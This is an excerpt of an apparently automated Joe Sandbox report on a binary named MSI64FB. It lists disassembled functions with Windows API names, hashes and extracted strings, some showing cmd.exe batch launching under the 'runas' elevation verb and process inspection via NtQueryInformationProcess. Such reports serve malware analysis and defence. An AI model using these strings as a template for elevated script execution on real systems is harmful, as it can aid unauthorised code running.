• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: EnvironmentStrings$Free
• String ID:
• API String ID: 3328510275-0
• Opcode ID: 129f9ed9d6e46fbe024be29005a8f184e39638c1c551896208562cd4bf81eeca
• Instruction ID: e86f49903e2ac3757eee9386bacd59ee1296ada7b57771da085066beaf231132
• Opcode Fuzzy Hash: 129f9ed9d6e46fbe024be29005a8f184e39638c1c551896208562cd4bf81eeca
• Instruction Fuzzy Hash: 4D01A111F0C761C1EB20BF21641406AE770AF45BE4B884630DF6E17BC5DE2CF8828360

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: __vcrt_uninitialize_ptd
• String ID:
• API String ID: 1180542099-0
• Opcode ID: 59d777d7a2a471f6221c9ac1909ae81a32853ae31e89e6473afd101fc85dda12
• Instruction ID: deab33de55c97879c2dd7bcb4a9dc964879da9c44ed7fd78389578a319e75304
• Opcode Fuzzy Hash: 59d777d7a2a471f6221c9ac1909ae81a32853ae31e89e6473afd101fc85dda12
• Instruction Fuzzy Hash: 4EE01A64E1D252C1FB94BF34244E0B8E2B02F67310FD00935D02E612C2EF1CA0059630

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF749F77F14
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F79F08: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF749F79F10
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F79F08: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF749F79F15
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1208906642-0
                                                                                                                                                                                                                                                    • Opcode ID: b406c482bd6f2c871e11d82f4c101536c11149533ae63c44bb7f5e876bfe7ee7
                                                                                                                                                                                                                                                    • Instruction ID: 4e68b0e6713fab946a96faf936f2508cbf5b1bf9ec41a17c3b39db0c8925c740
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b406c482bd6f2c871e11d82f4c101536c11149533ae63c44bb7f5e876bfe7ee7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8E09210D3CA42C1FF947E6116422F886740FA1344FD01CF8F45A461C3DE4EA05615B1

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 393 7ff749f919f0-7ff749f91a1f VirtualProtect
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: af451be784cd1612df3aad53b5d54c203146c96e75ed0741bde73cc1dd9b507a
                                                                                                                                                                                                                                                    • Instruction ID: d79ee1cfe8a9a4e691c682836160e96de455094a90f98e528cb663fc3142c860
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af451be784cd1612df3aad53b5d54c203146c96e75ed0741bde73cc1dd9b507a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FD0C925B39542C3E340AF51D885BA5A368B798701FD05025E94A81698CF7CD299CB21

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF749F8E68D,?,?,00000000,00007FF749F7D9CF,?,?,?,00007FF749F8C5CB,?,00000000,?,00007FF749F8C4C1), ref: 00007FF749F8ED3E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                    • Opcode ID: 9c33abf06edc4973dd13413fb3fae6b4b6ada102295991483a2b98f6ebe4a3f4
                                                                                                                                                                                                                                                    • Instruction ID: 1e69d75b78b5645cb91a13d28d89c8e0852f0de156cb91bab7f3e0d8ae589687
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c33abf06edc4973dd13413fb3fae6b4b6ada102295991483a2b98f6ebe4a3f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BF0F812B4D206C5FFA8BEA158492B5D1A05FA57A0FC84A30ED2E9A2C5EF2CE4494630
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$GetcollGetctypeGetvals
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 553569086-0
                                                                                                                                                                                                                                                    • Opcode ID: 550fe537e3995708685281ba595a73be6ebecc8fbae1a6eacc8b5c44945c65f2
                                                                                                                                                                                                                                                    • Instruction ID: 560f696d762d8bed3ff0a9e5608eb1a884363ec5a2959cb078123b56995e7c53
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 550fe537e3995708685281ba595a73be6ebecc8fbae1a6eacc8b5c44945c65f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB824D62A0DB42C5FB45BF21D8902B9B7B0AF94784BD84535E90E467D6DF3CE982C360
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$GetcollGetctype
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 19648113-0
                                                                                                                                                                                                                                                    • Opcode ID: 208578fbf0aff5e00fbc3174e06ca2abcd74e2038bad76ee8959a3c603800faa
                                                                                                                                                                                                                                                    • Instruction ID: c72a7ff790d489bb143522ac8ac04e556f77fc77679af3091e63404c2a244b79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 208578fbf0aff5e00fbc3174e06ca2abcd74e2038bad76ee8959a3c603800faa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C822A61E0DB42C5EB49FF21D8902B8A7B0AF54784FC94535E90E476D6EE3CE982C361
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$Getcoll
• String ID:
Similarity
• API ID: Local$Free$ByteCharMultiWide_invalid_parameter_noinfo_noreturn$AllocExecuteFileShell$CloseCreateHandleWrite
• String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
Similarity
• API ID: memcpy_s$_invalid_parameter_noinfo
• String ID: $
Similarity
• API ID: Window$ForegroundProcessThread$ExecuteShell$AllowAttachCodeCurrentDirectoryExitInputObjectSingleWaitWindows_invalid_parameter_noinfo
• String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$open$p$runas
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
• String ID:
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                    • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                    • Opcode ID: e74b7c554f0aa12a6b9c746d306bf12b71be30ff750c5c24f689410cfc5ee520
                                                                                                                                                                                                                                                    • Instruction ID: ca1ff963b25e3dc5d11b738ed330b6565f2b26db4c5023c48ef98a7e43079e2b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e74b7c554f0aa12a6b9c746d306bf12b71be30ff750c5c24f689410cfc5ee520
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFB2F372A1C282CBE764AF69D540BFDB7B1FB45388F915135DA0A57EC8DB38A640CB10
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn$AllocLocalLockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID: %$%.0Lf$+$0123456789-$0123456789-
                                                                                                                                                                                                                                                    • API String ID: 4069415512-1072446943
                                                                                                                                                                                                                                                    • Opcode ID: 68b818fdd4fa0d3491a4a663ffc368d1b1ade6ce1f83f0a6d6487fda03f9679b
                                                                                                                                                                                                                                                    • Instruction ID: fc8b7e7b7869c3ec43955df37c438eb574215a164659a5051f2de839183afaee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68b818fdd4fa0d3491a4a663ffc368d1b1ade6ce1f83f0a6d6487fda03f9679b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28A2BE22B08B85C5EB10FFA5E4543ADA371EB54B98F904232DE6D13BE9DE38D956C310
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastLibraryMemoryProcessRead$AddressDirectoryFreeLoadProcSystem_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                    • API String ID: 2371894688-2781105232
                                                                                                                                                                                                                                                    • Opcode ID: fa4e8a4a4fe302e818cb703e1c28a202aba8cba095d5580f8156be16ff62753c
                                                                                                                                                                                                                                                    • Instruction ID: 33cf4cf00c387974a5ca496b16f27b951738fe28d7482ad1da0f17b30aa23d04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa4e8a4a4fe302e818cb703e1c28a202aba8cba095d5580f8156be16ff62753c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6B14022A58BC2C6EB209F20D8447EC73B0FB9478CF505235DA4916AA9DF7CE2D5C754
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4F8A0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF749F4F8B5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4F8A0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF749F4F8DA
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4F8A0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF749F4F905
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4F8A0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF749F4F9A6
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F6B601
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                    • API String ID: 533778753-2891247106
                                                                                                                                                                                                                                                    • Opcode ID: 4734cba8c0ebb69a97ca93dca8d55ba972b5f41057bfdbc9d0f9bcfce3cc0323
                                                                                                                                                                                                                                                    • Instruction ID: ea889f661ed30827eba3020b5743670ba392af958bfcb3d05b7cb841b2fa156a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4734cba8c0ebb69a97ca93dca8d55ba972b5f41057bfdbc9d0f9bcfce3cc0323
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89426B32A1CB46C9EB14AF65D4501BCB771FB49B88B844135EE4D13BA9DF38E946C350
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4CBB0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF749F4CBC5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4CBB0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF749F4CBEA
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4CBB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF749F4CC15
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4CBB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF749F4CCB6
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F76370
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F76700
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F432A0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF749F4101D), ref: 00007FF749F432B2
                                                                                                                                                                                                                                                    • _Wcsftime.LIBCMT ref: 00007FF749F767CD
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F76977
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$_invalid_parameter_noinfo_noreturn$Lockit::_Lockit::~_$AllocLocalWcsftime
                                                                                                                                                                                                                                                    • String ID: !%x$%.0Lf$0123456789-
                                                                                                                                                                                                                                                    • API String ID: 1237603019-778084515
                                                                                                                                                                                                                                                    • Opcode ID: 00bc372d4dcd9754968869968e82af8cdb94930d39b3e0abb69084ef3b2f15b3
                                                                                                                                                                                                                                                    • Instruction ID: 1f31bc19c941df94e5a5a62243082f7cc64ca0f383daa9f523be2bc4f91e5e0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00bc372d4dcd9754968869968e82af8cdb94930d39b3e0abb69084ef3b2f15b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F462BE62B0CA8589EB11FFA5E8103BCA771AB55BD8F844232EE1D17BDADE38D445C311
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: %$+
                                                                                                                                                                                                                                                    • API String ID: 195334829-2626897407
Similarity
• API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
• String ID: utf8
• API String ID: 2487361160-905460609
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
• _get_daylight.LIBCMT ref: 00007FF749F91CF1
  • Part of subcall function 00007FF749F91B38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91B4C
  • Part of subcall function 00007FF749F8E5C0: HeapFree.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5D6
  • Part of subcall function 00007FF749F8E5C0: GetLastError.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5E0
  • Part of subcall function 00007FF749F7DE54: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF749F7DE02,?,?,?,?,?,00007FF749F7DD02), ref: 00007FF749F7DE5D
  • Part of subcall function 00007FF749F7DE54: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF749F7DE02,?,?,?,?,?,00007FF749F7DD02), ref: 00007FF749F7DE82
  • Part of subcall function 00007FF749F9A534: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F9A47F
• _get_daylight.LIBCMT ref: 00007FF749F91CE0
  • Part of subcall function 00007FF749F91B98: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91BAC
• _get_daylight.LIBCMT ref: 00007FF749F91F5A
• _get_daylight.LIBCMT ref: 00007FF749F91F6B
• _get_daylight.LIBCMT ref: 00007FF749F91F7C
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF749F921C6), ref: 00007FF749F91FA3
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
Similarity
• API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
• String ID:
• API String ID: 3082464267-0
                                                                                                                                                                                                                                                    • Opcode ID: afc32d9d63be1d3e4626d176850ab3f8e49c11078196f985b874c262b1335c21
                                                                                                                                                                                                                                                    • Instruction ID: 1c814b9008863fbaff11f198c46ed9c24da99065e48217ab8c0cb416076f5d79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afc32d9d63be1d3e4626d176850ab3f8e49c11078196f985b874c262b1335c21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4713222B1C642C9FB64BFA0D8506A8A3B4BB4A788FC84435CA1D576D5EF3CE845C761
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                    • String ID:
